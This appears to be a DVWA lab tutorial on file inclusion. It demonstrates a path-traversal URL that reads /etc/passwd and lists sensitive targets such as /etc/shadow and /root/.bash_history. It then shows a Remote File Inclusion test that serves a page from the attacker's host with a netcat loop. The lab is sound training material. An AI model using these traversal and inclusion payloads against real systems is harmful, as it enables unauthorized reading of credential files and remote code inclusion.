DVWA 1.9+: File Inclusion using Netcat as web server
This part 5 of the DVWA Lab, and in this part we’ll cover file inclusion. So what is file inclusion and why is it a big deal?
When a web applications allows the user to specify input directly to the file streams or upload files, it’s opening an attack vector to execute malicious code. If the malicious code file is in the target machine, this attack is called Local File Inclusion (LFI). If the files are external, it’s called Remote File Inclusion (RFI).
This is on more article of the DVWA series. You can grab all articles here.
Local File Inclusion
Open your browser, enter DVWA URL, login and navigate to the ‘file inclusion’ page.
If we click in the links file1.php, file2.php, file3.php and look the the generated URL, we can see that the filename is inserted in each page. Let’s tamper with the URL:
http://192.168.231.110/vulnerabilities/fi/?page=../../../../../etc/passwd
Remeber to set the security level to low.
The browser rendered the page with passwd contents. We can pry on other interesting files:
- /etc/issue
- /proc/version
- /etc/profile
- /etc/passwd
- /etc/passwd
- /etc/shadow
- /root/.bash_history
- /var/log/dmessage
- /var/mail/root
- /var/spool/cron/crontabs/root
Remote File Inclusion
We’re going to try RFL in out target. First, let’s create a file to test:
$ nano rfi.php
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: netcat!<!DOCTYPE html>
<html xmlns=”http://www.w3.org/1999/xhtml">
<head>
</head>
<body>
<h1>Fake DVWA page</h1>
<h2>Remote File Inclusion Test</h2>
</body>
</html>
We’re going to use same method as before, first create the file with a corresponding header, then serve the file using Netcat as a simple web server:
# while true; do nc -l -p 80 < rfi.php; done;
Note the ‘#’. We’ll need root privileges to use port 80.
You can try the URL in your browser (http://your_kali_ip_address). Now, append this same URL in DVWA address:
http://192.168.231.110/vulnerabilities/fi/?page=http://192.168.231.107/rfi.php
This is it. Target hacked.
Conclusion
In this article we’ve tackled with File Inclusion vulnerabilities. Don’t miss the next article.